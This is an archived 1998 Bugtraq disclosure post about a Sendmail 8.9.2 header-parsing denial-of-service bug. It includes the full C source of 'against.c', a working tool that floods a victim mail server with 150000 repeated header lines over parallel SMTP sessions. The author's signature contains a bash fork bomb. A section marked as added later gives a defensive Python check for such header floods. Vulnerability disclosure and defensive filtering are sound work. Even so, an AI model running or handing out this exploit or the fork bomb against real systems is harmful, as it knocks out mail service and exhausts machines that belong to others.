[ http://www.rootshell.com/ ]

Date: Sat, 12 Dec 1998 19:39:56 +0100
From: Michal Zalewski <lcamtuf@IDS.PL>
To: BUGTRAQ@netspace.org
Subject: ** Sendmail 8.9.2 DoS - exploit ** get what you want!

Hello again.

Yesterday, I published some rather laconic information about two bugs in Sendmail up to 8.9.2, and decided to post only a short description of the problem + suggested patch (instead of an exploit), to give developers a chance. Unfortunately, I put together information about two completely different problems in a single posting, and it confused a lot of people. So, to kill any senseless discussions - again:

- The first one was the 'redirection attack'; I said you could call it a 'bug' instead of a 'feature', but as no one likes anonymous mailbombing, network overloading / scanning, it's good to apply the sendmail.cf patch included in the original posting; without it, your relay could be abused in many painful ways. And yes, the attack has been confirmed with 8.9.2 and sendmail.cf from 8.9.2 with relaying enabled. I don't think there's anything left to talk about. Dot.

- The second one was a DoS attack during header parsing - and this is a bug, *confirmed on 8.9.2*. I included a simple patch to the source tree. Unfortunately, all feedback we received from developers was the one-line response 'It has been fixed in 8.9.2'. Bullshit (sorry). I decided not to publish an exploit, but now I realized there's no chance for a response from vendors if there's no real danger. So here it is. The attached file, against.c, should perform a very 'light' attack, only for testing purposes. If you notice increased LA during the attack, your machine is vulnerable. You had enough time to patch your system - don't blame me, but vendors.

EOF.

_______________________________________________________________________
Michal Zalewski [lcamtuf@ids.pl] [ENSI / marchew] [dione.ids.pl SYSADM]
[http://linux.lepszy.od.kobiety.pl/~lcamtuf/] <=--=> bash$ :(){ :|:&};:
[voice phone: +48 (0) 22 813 25 86]
[pager (MetroBip): 0 642 222 813]
To iterate is human, to recurse divine. [P. Deutsch]

-------------------------------------------------------------------------

/* against.c - Another Sendmail (and pine ;-) DoS (up to 8.9.2)
   (c) 1999 by <marchew@linux.lepszy.od.kobiety.pl>

   Usage:   ./against existing_user_on_victim_host victim_host
   Example: ./against nobody lamers.net */

#include <stdio.h>
#include <unistd.h>
#include <sys/param.h>
#include <sys/socket.h>
#include <sys/time.h>
#include <sys/wait.h>      /* waitpid() - missing from the original */
#include <netinet/in.h>
#include <netdb.h>
#include <stdarg.h>
#include <errno.h>
#include <signal.h>
#include <getopt.h>
#include <stdlib.h>
#include <string.h>
#include <strings.h>       /* bcopy() - missing from the original */

#define MAXCONN 5          /* number of parallel SMTP sessions */
#define LINES   150000     /* "To: x" header lines sent per session */

struct hostent *hp;
struct sockaddr_in s;
int suck, loop, x;

int main(int argc, char *argv[])
{
    printf("against.c - another Sendmail DoS (up to 8.9.2)\n");
    if (argc - 3) {
        printf("Usage: %s victim_user victim_host\n", argv[0]);
        exit(0);
    }
    hp = gethostbyname(argv[2]);
    if (!hp) {
        perror("gethostbyname");
        exit(1);
    }
    fprintf(stderr, "Doing mess: ");

    /* Each child opens one SMTP session and feeds it a message whose
       header block consists of LINES repeated "To: x" lines. */
    for (; loop < MAXCONN; loop++)
        if (!(x = fork())) {
            FILE *d;
            bcopy(hp->h_addr, (void *)&s.sin_addr, hp->h_length);
            s.sin_family = hp->h_addrtype;
            s.sin_port = htons(25);
            if ((suck = socket(AF_INET, SOCK_STREAM, 0)) < 0)
                perror("socket");
            if (connect(suck, (struct sockaddr *)&s, sizeof(s)))
                perror("connect");
            if (!(d = fdopen(suck, "w"))) {
                perror("fdopen");
                exit(0);
            }
            usleep(100000);
            fprintf(d, "helo tweety\n");
            fprintf(d, "mail from: tweety@polbox.com\n");
            fprintf(d, "rcpt to: %s@%s\n", argv[1], argv[2]);
            fprintf(d, "data\n");
            usleep(100000);
            for (loop = 0; loop < LINES; loop++) {
                if (!(loop % 100))
                    fprintf(stderr, ".");
                fprintf(d, "To: x\n");
            }
            fprintf(d, "\n\n\nsomedata\n\n\n");
            fprintf(d, ".\n");
            sleep(1);
            fprintf(d, "quit\n");
            fflush(d);
            sleep(100);
            shutdown(suck, 2);
            close(suck);
            exit(0);
        }

    /* Note: only the last forked child is waited for. */
    waitpid(x, &loop, 0);
    fprintf(stderr, "ok\n");
    return 0;
}
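An added defensive example, not part of the original post and not sendmail's own code: a small Python check that a mail gateway or milter could apply to a submitted message to reject a header block shaped like the one against.c generates (tens of thousands of repeated "To:" lines) before it reaches the MTA's header parser. The thresholds, function names and sample messages are assumptions constructed for this illustration.

```python
from collections import Counter

# Assumed policy limits: a legitimate message has a few dozen header lines
# and rarely repeats any single header name more than a handful of times.
MAX_HEADER_LINES = 1000
MAX_SAME_HEADER = 50


def header_stats(message):
    """Return (total header lines, Counter of header-name repeats).

    The header block ends at the first empty line (RFC 822). Continuation
    lines (leading whitespace) count toward the total but add no new field.
    """
    total = 0
    per_name = Counter()
    for line in message.split("\n"):
        line = line.rstrip("\r")
        if line == "":
            break
        total += 1
        if line[0] in " \t":
            continue  # folded continuation of the previous header
        name, sep, _ = line.partition(":")
        # A header line without a colon is malformed; bucket it separately.
        per_name[name.strip().lower() if sep else "<malformed>"] += 1
    return total, per_name


def is_header_flood(message, max_lines=MAX_HEADER_LINES, max_same=MAX_SAME_HEADER):
    """Return (flagged, reason) for a message that should be rejected."""
    total, per_name = header_stats(message)
    if total > max_lines:
        return True, "%d header lines exceeds %d" % (total, max_lines)
    if per_name:
        name, n = per_name.most_common(1)[0]
        if n > max_same:
            return True, "header '%s' repeated %d times exceeds %d" % (name, n, max_same)
    return False, "ok"


# Constructed samples: an ordinary message, and one shaped like the
# DATA payload against.c sends (150000 "To: x" lines, then a body).
NORMAL = "From: a@example.org\nTo: b@example.org\nSubject: hi\n\nbody\n"
FLOOD = "To: x\n" * 150000 + "\n\n\nsomedata\n\n\n"

if __name__ == "__main__":
    for label, msg in (("normal", NORMAL), ("flood", FLOOD)):
        print(label, is_header_flood(msg))
```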